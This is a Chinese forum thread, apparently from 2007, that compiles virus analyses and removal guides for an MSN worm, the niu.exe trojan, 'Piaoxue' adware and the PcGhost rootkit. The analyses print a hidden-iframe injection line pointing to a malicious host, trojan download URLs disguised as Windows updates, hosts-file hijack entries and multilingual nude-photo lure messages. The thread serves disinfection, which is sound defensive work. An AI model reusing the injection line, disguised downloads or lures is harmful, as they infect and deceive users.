常见病毒解决方案大全
不错,这个凡个病毒折磨大家很久了,这贴说很好 :L::P: 值得学习AVI病毒怎么处理呀?
AVI病毒怎么处理呀? xiexie 说的不错哦,谢谢了,先学着 能不能讲一下IE病毒 可不可以用AV终级者杀吗/ 顶起回复 #1 唯一 的帖子
msn image病毒的新变种,向MSN联系人发送诱惑文字消息和伪装成照片的带有病毒自身的压缩包(如图),如果对方联系人接受并打开压缩包中的病毒文件,则系统被感染。
和以往变种不同的是,这次的新变种发送给MSN联系人的病毒压缩包文件名不固定,而且
发送的消息里加入了汉语拼音。
病毒被运行后在系统目录%Windows%生成包含自身副本的ZIP压缩文件,此文件名不固定
,由以下字符加数字组成:
QUOTE:
images0
photos0
album
photo
pictures0
picture
例如:
QUOTE:
images047.zip(images047.scr)
photo92.zip(photo92.scr)
创建一个病毒副本:
%System%\printers.exe
释放一个dll文件注入进程:
%System%\notiffy.dll
创建ShellServiceObjectDelayLoad启动方式:
CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceOb
jectDelayLoad]
"printers"="{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"
[HKEY_CLASSES_ROOT\CLSID\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}\InProcServer
32]
@="notiffy.dll"
注:{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}为一串CLSID,病毒产生的这段CLSID不
固定,如:{2BD8B5A4-3417-4CA8-A8F8-8EBA8144454A}
病毒给MSN联系人发送病毒压缩包的同时根据系统语言发送不同的文字消息:
QUOTE:
Look how wasted Paris Hilton is, after she got jailed :(
You and Me !!! .... look :p
Look at my photos hihi :p
Hey please accept my photos :o !!
A photo with me and my best friend :$ !!
This is me totaly naked :o please dont send to anyone else
Look what i found on the NET :o Jessica Alba NUDE !!
bak sana Paris Hilton ne hale gelmis hapiste :(
Sen ve Ben !!! .... BAK :p
Baksana benim fotograflara hihi :p
Hey benim fotolarimi kabul et :o !!
Iyi arkadasimla fotorafdayim :$ !!
benim bu ciplak fotoda :o ama baskasina yollama
bak ne buldum :o Jessica alba ciplak !!
Regarde comment Paris Hilton parait efondr?apr鑣 qu’’elle ai 閠?jeter en pri
son :(
Toi et moi !!! .... regarde :p
Regarde mes photos :p
Hey s’’il te plait accepte mes photos :o !!
Une photo de moi et mon meilleur ami :$ !!
C’’est moi totalement nu :o s’’il te plait ne l’’envoie a personne d’’autre
Regarde ce que j’’ai trouv?sur le net :o Jessica Alba NU !!
Kijk hoe erg Paris Hilton er aan toe is na gevangenschap :(
Jij en Ik !!!! .... kijk :p
Kijk eens naar mijn fotos hihi :p
HEY !! accepteer mn fotos dan !
met mijn beste vriend op de foto !! :$
Dit ben ik naakt op de foto, stuur alsjeblieft niet door.
Kijk wat ik gevonden heb :o Jessica Alba naakt !!
guck wie scheisse Paris Hilton aussieht, seitdem sie wieder aus dem knast is
t :(
du und ich !!! ....guck :p
siehe meine fotos hihi :p
hey bitte nimm meine fotos an :o !!
ein foto mit meinem besten freund und mir :$ !!
das bin ich total nackt :o bitte sende es niemand anderem
guck was ich im internet gefunden habe :o jessica Alba NACKT !!
Guarda come Paris Hilton sprecato ? dopo che era imprijonata :(
Tu ed io !!! .... guarda :p
Guardi le mie foto hihi :p
Mairee photos accept karo :o !!
Una foto con me ed il mio amico migliore :$ !!
Questa e me totaly nudo :o prego non trasmette a chiunque
Osservi che cosa ho trovato sul internet :o Jessica alba NUDA !!
Veja como Paris Hilton est?acabada depois de ter sido presa :(
Voc?e eu !!!! .... Veja :p
Veja as minhas fotos hehehe :p
Por favor aceite as minhas fotos :o !!
Uma foto com o meu melhor amigo e eu :$ !!
Esta sou eu totalmente nua :o por favor n鉶 mande isso pra ningu閙
Olha o que eu achei na NET :o Jessica Alba NUA !!
kAN BA LI XI ER DUN JIN JIANYU HOU SHI DUO ME QIAOCUI :(
NI HE WO !!! .... QING KAN :p
KAN WO DE ZHAOPIAN :p
JIESHOU WO DE ZHAO PIAN :o !!
YI ZHANG WO GEN WO PENGYOU ZUI HAO DE ZHAOPIAN :$ !!
ZHE SHI WO DE LUOZHAO :o QING BU YAO FA GEI BIEREN !!
Kolla hur f鰎st鰎d Paris Hilton 鋜, efter att hon f鋘gslades :(
Du och jag !! .... Kolla ;)
Kolla p?min bilder, hihi :p
Hey, acceptera mina bilder, sn鋖la :o
En bild p?mig och min b鋝ta v鋘 :$ !!!
Detta 鋜 jag HELT naken.. :o Skicka inte till n錱on annan, sn鋖la...
Kolla vad jag hittade p?n鋞et :o Jessica Alba NAKEN !!
Mira c髆o Paris Hilton es perdida despu閟 de ser encarcelada :(
Usted e yo !!! ....
Mira :p Mira mis fotos jejeje :p
Ha aceptado mis fotos por favor :o !!
Una foto con mi mejor amigo e yo :$ !!
Esta soy yo totalmente desnuda :o por favor no env韆 para nadie
Mira lo que encontr?en la WEB :o Jessica Alba DESNUDA !!
Lede hvor spild Paris Hilton er efter hun fik f鎛gsel :(
Jer og Mig !!! ... se :p
Se p?min fotos :p
Hej behage optage min foto :o !!
EN foto hos mig og min bedst ven :$ !!
denne er mig hele bar behage vage vendlig og sende den ikk til nogle :o
Lede hvad jeg fandt oven p?den net :o Jessica Alba bar !!
尝试连接远程IRC:john.free4people.net
在注册表中还创建有以下信息:
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\kfKJnDMR]
"gPYbYwsI"
清除步骤
==========
1. 删除病毒的启动方式:
[Copy to clipboard]
CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\ShellServiceObjectDelayLoad]
"printers"="{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"
以及对应的:
[Copy to clipboard]
CODE:
[HKEY_CLASSES_ROOT\CLSID\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}\InProcServer
32]
@="notiffy.dll"
2. 重新启动计算机
3. 删除文件:
%System%\notiffy.dll
%System%\printers.exe
%userprofile%\new.txt
以及%Windows%目录下由以下字符和数字组成文件名、大小约119KB的病毒压缩包文件:
QUOTE:
images0
photos0
album
photo
pictures0
picture
例如:
QUOTE:
images047.zip(images047.scr)
photo92.zip(photo92.scr)
回复 #1 唯一 的帖子
niu.exe,crsss.exe病毒分析病毒特征:
File: niu.exe
Size: 36141 bytes
MD5: 1E3096FAE27F2E81F0AA73FFFA5171B0
SHA1: BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF
CRC32: C9ACBC14
病毒运行后:
文件变化:
释放文件C:WINDOWSsystem32crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化
遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=http://www.xxxxxx.cn/htm/htm.htm width=0 height=0></IfrAmE>
遍历所有分区 删除*.gho文件
删除C:WINDOWSsystem32verclsid.exe
注册表变化
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
下添加<crsss><C:WINDOWSsystem32crsss.exe> [] 达到开机启动的目的
修改HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate下面增加
DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能
如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart Page为 www.hao123.com
并且修改HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage 的值为00000001
使得IE主页修改按钮失效
如果连接网络则为如下变化
下载http://www.xxxxxx.cn/htm/IEURL.txt到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址
下载http://www.xxxxxx.cn/htm/exe.txt到系统文件夹 读取里面的内容
下载木马
http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138308-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB238104-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284302-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB468603-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB878206-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB423807-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138309-x86-CHS.exe
到系统文件夹 分别命名为0temp.exe~13temp.exe
木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等 而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启
具体原理不懂 希望高手指教
木马植入完毕后 生成文件如下
C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
sreng日志如下
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows]
<AppInit_DLLs><dhbpri.dll> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
服务
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
<C:WINDOWSsystem32rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>
[[i] 本帖最后由 天狼星 于 2007-10-16 15:07 编辑 [/i]]
回复 #75 天狼星 的帖子
解决方法:首先把系统时间改回来
并且修改 C:WINDOWSsystem32dhbpri.dll和
C:WINDOWSsystem32ztgpri.dll文件名为其他名称
然后重启计算机进入
安全模式(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service / RemoteDbg
系统修复-Windows shell/IE 选中
设置主页为"about:blank"和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复
把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
从左边的资源管理器 进入C盘
删除如下文件C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll改完名称的文件
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll改完名称的文件
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
C:WINDOWSsystem32crsss.exe
C:autorun.inf
C:niu.exe
从左边的资源管理器 进入其他分区 删除autorun.inf和niu.exe。
使用一些工具清理被感染的htm等文件。不过gho文件就没办法恢复了。
[[i] 本帖最后由 天狼星 于 2007-9-22 13:44 编辑 [/i]] :handshake 8错!!!!继续。支持兄弟!!!!!
解决飘雪这个流氓
金山毒霸从2006年11月14日全力推出系统清理专家以来,在全国范围内迅速追杀流氓软件,其中一批名为“飘雪”的流氓团伙竟采用了一些恶性病毒应用的技术手段躲避围剿。其团伙成员作案手法极其相似:强行修改并锁定用户主页,致使用户根本无法修改。受害用户之多,行凶手段之卑劣,令人发指。金山毒霸“反流氓”特别小组已经受理了3000宗左右“飘雪”案例。据不完全统计:目前国内受飘雪感染的用户已达百万。
流氓团伙“飘雪”档案
代号:飘雪
类别:流氓软件
传播方式:软件捆绑或网页传播
特征:飘雪系列流氓软件是具有病毒行为的新型流氓软件,主要危害是锁定用户ie浏览器的主页,并且无法修改;使用Rootkits驱动保护技术,使得用户难以清除。
团伙主要成员:3448、河南4199、7939、my123等
“飘雪”团伙主要成员危害行为
一号成员“3448”危害行为描述:
1.强行更改IE的主页为HTTP://WWW.344*.COM
2.如发现窗口标题栏包含3448、7939等字符,将强行关闭计算机
3.利用HOOK技术,隐藏病毒添加的注册表项目
二号成员“my123”危害行为描述:
1.强行修改用户IE主页为WWW.MY123.COM,并不能轻易修改
2.使用Rootkits驱动保护,使用户无法彻底清除
3.升级速度快,变种频繁
三号成员“7939”危害行为描述:
1.强行修改用户IE主页为WWW.7939.COM,并不能轻易修改
2.使用Rootkits驱动保护,使用户无法彻底清除
3.传播速度快,升级频繁,逃避追杀
其他成员危害行为:
123wa
1.创建桌面文件123WA.COM中国娱乐导航.URL
2.修改IE首页为HTTP://WWW.123WA.COM/INDEX5.HTM
3.在IE收藏夹添加一个栏目:123WA.COM中国娱乐导航
4.将快速启动栏中的IE去掉,添加一个栏目,并显示为IE图标
5.在IE工具条上添加一个显示为123wa图标的按钮
6.将HTTP://WWW.123WA.COM/INDEX2.HTM添加到IE历史浏览记录中
piaoxue
1.强行修改用户IE主页为WWW.PIAOXUE.COM并不能轻易修改
2.使用Rootkits驱动保护,使用户无法彻底清除
3.传播速度快,升级频繁,逃避追杀
专家建议
不要随意登陆一些不知名的小网站,以免感染病毒或流氓软件;
通过网络下载文件时,提前打开防火墙;
安装正版杀毒软件,开启实时监控。
清除方法
金山毒霸系统清理专家采用了先进的数据流杀毒及抗Rootkit技术,可以彻底清除“飘雪”系列流氓软件:
免费下载并安装金山毒霸系统清理专家;
开启自动升级功能选项,升级到最新版本;
点击隐蔽软件扫描功能,进行查杀。
数据流杀毒:基于传统的静态磁盘文件和狭义匹配技术,更进一步从网络和数据流入手,极大地提高了查杀木马及其变种的能力。
Rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具。Rootkit有两种模式,一种是应用程序级,一种是驱动程序级,目的都是为了隐藏文件、注册表、进程等可能暴露自己的信息。
附:飘雪系列流氓软件分析报告
1.生成文件
生成随机名的驱动程序,有的变种会在system32目录下生成随机文件名的dll程序。
2.添加注册表启动项
生成随机名的服务项,
有的会添加HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows Current VersionRun下随机名启动项。
3.驱动模块不停写注册表HKEY_CURRENT_USER Software Microsoft InternetExplorer MainStartPage项,使得主页不能被修改。
4.自我保护
驱动模块不停写注册表HKEY_LOCAL_MACHINE SYSTEM CurrentControl SetServices下驱动文件的启动项;保护驱动文件不能被删除。
5.更改ie浏览器主页
www.3448.com
www.265.com
www.my123.com
www.feixue.net
www.piaoxue.com
about-blank.cc
“勾结者”病毒的原理
“勾结者”病毒档案病毒名称:勾结者 英文名称:Win32.Troj.Downloader.eg
威胁级别:★★ 病毒类型:木马
病毒特点:该病毒为Windows平台下通过网络下载其它木马、病毒或广告软件的病毒,主要通过网络欺骗或软件捆绑方式进行传播。
病毒介绍:病毒运行后将自身伪装成正常程序文件,在后台释放出伪系统正常文件进行病毒的自我更新、下载其它病毒;病毒可伪装成聊天软件QQ、Realplayer的相关文件,使用户不易发觉。
“勾结者”病毒危害:
1.弹出大量广告页面;
2.修改用户IE主页;
3.强行修改相关注册表项,使用户无法显示隐藏文件;
4.病毒能通过修改特定文件使用户无法正常访问某些网站如[url]www.hao123.com[/url]等。
勾结者可屏蔽六大网站
勾结者可修改“%Windir% system32 driversetc hosts”文件添加以下内容,使用户无法正常访问相关网站:
127.0.0.1 localhost
59.34.148.98 [url]www.hao123.com[/url]
59.34.148.98 [url]www.4199.com[/url]
59.34.148.98 [url]www.9505.com[/url]
59.34.148.98 [url]www.7322.com[/url]
218.5.76.175 [url]www.huoche.com.cn[/url]
专家建议:
1.由于病毒文件较多,手工清除存在困难,建议用户及时安装金山毒霸2007;
2.提高网络安全意识,对一些虚假且带有欺诈性质的信息、邮件附件具备一定的判断能力;
3.安装新程序前,运行杀毒软件,并开启防火墙、实时监控功能。
金山毒霸反病毒应急中心及时进行了病毒库更新,升级毒霸到2006年11月10日的病毒库即可查杀以上病毒;如未安装金山毒霸,可以登录 [url]http://www.duba.net[/url] 免费下载最新版金山毒霸2007 或使用 金山毒霸在线业务 清除该病毒
流氓软件“幽灵”
流氓软件“幽灵”档案:名称:幽灵
行为追踪:“幽灵”运行后可将自己拷贝到%ProgramFiles%Common Files23OSA.EXE中,并释放23OFFICE.dll、23MsOffTDI.sys、23AnRegProt.sys等3个病毒文件,之后添加一个快捷方式到C:Documents and SettingsAll Users开始菜单程序启动Microsoft Office 23.lnk,使病毒能随Windows启动。
三大危害:
1. 破坏系统安全模式
删除安全模式的注册表键值,使用户无法进入安全模式,即使强行进入,也会导致系统蓝屏崩溃
2. 阻止IceSwrod启动
阻止版本号为1.18与1.20的IceSwrod驱动文件释放,使这两个版本的IceSwrod无法启动
3. 下载大量广告程序与病毒文件
开启一个IE进程,读取网址http://t1.*******.net/jw/ini/rules.ini上的内容,并从该址下载广告程序和病毒文件。
“幽灵”分析报告:
Win32.Troj.PcGhost.a
中文名:“幽灵”
这是一个能删除系统安全模式的恶意病毒,它还能通过驱动程序的HOOK隐藏自己,并下载广告和病毒程序,使用户的计算机受到更多广告程序的干扰。
1.拷贝与释放文件 病毒能把自己拷贝到这里: %ProgramFiles%Common Files23OSA.EXE
并释放3个文件
%ProgramFiles%Common Files23OFFICE.dll (Win32.Troj.PcGhost.a.40960)
%ProgramFiles%Common Files23MsOffTDI.sys (Win32.Troj.PcGhost.a.5120)
%ProgramFiles%Common Files23AnRegProt.sys (Win32.Troj.PcGhost.a.6016)
之后添加一个快捷方式
C:Documents and SettingsAll Users开始菜单程序启动Microsoft Office 23.lnk
该LNK指向%ProgramFiles%Common Files23OSA.EXE,使病毒能随Windows启动.
2.驱动级和用户级的Rootkit
病毒会同时使用驱动级(Ring0)与用户级(Ring3)的Rootkit技术隐藏自己的信息,包括程序文件,进程等,使用户无法察觉病毒的存在。
23AnRegProt.sys (Win32.Troj.PcGhost.a.6016)
这个驱动文件负责进行函数欺骗的,使特定的文件不显示:
该驱动HOOK了这几个函数:
ZwOpenKey
ZwSetValueKey
ZwCreateKey
ZwQueryDirectoryFile
一但以上函数返回值有以下字符时,就返回失败,使系统误以为不存在这些文件
230SA.EXE
23OFFICE.DLL
MICROSOFT OFFICE 23.LNK
这样使得在注册表,文件管理器等工具都无法发现病毒文件.
23MsOffTDI.sys (Win32.Troj.PcGhost.a.5120)
这个文件负责锁定23AnRegProt.sys与自己,防止被用户或其它软件删除。
3.破坏安全模式
病毒会把安全模式的注册表键值删除,键值如下:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetSafeBoot
病毒把该键值下面全部项都删除,使用户无法进入安全模式,若用户强行进入安全模式的话会导致系统蓝屏崩溃。
4.干扰IceSword运行
病毒会阻止版本号为1.18与1.20的IceSwrod驱动文件释放,使这两个版本的IceSwrod无法启动。
5.下载广告
病毒会开启一个IE进程(进程使用Rootkit技术隐藏),并读取一网址上的内容,
该网址为http://t1.*******.net/jw/ini/rules.ini
里面的内容为:
----------------------------------------------
[Version]
Item0=20061201
Item1=20061202
Item2=20061201
[File]
Item0=http://61.182.**.**/xzq/30009.exe
Item1=http://61.182.**.**/new/Setup.exe
Item2=http://61.182.**.**/new/setie.exe
[Size]
Item0=62243
Item1=263531
Item2=227446
并下载里面的文件到C:Documents and SettingsAll UsersApplication DataADSL之后运行这些文件,其中30009.exe是病毒文件,病毒名为Win32.Troj.Dropper.rk.62243。
此病毒文件能重新释放Win32.Troj.PcGhost.a病毒,据INI文件分析,该病毒还可能出现新的变种,病毒作者很有可能会在近期放出不同的变种。而Setup.exe与setie.exe则是广告程序,它使用户的计算机受到广告程序的干扰,严重影响了用户的工作。
清除该病毒可到毒霸主页下载专杀。
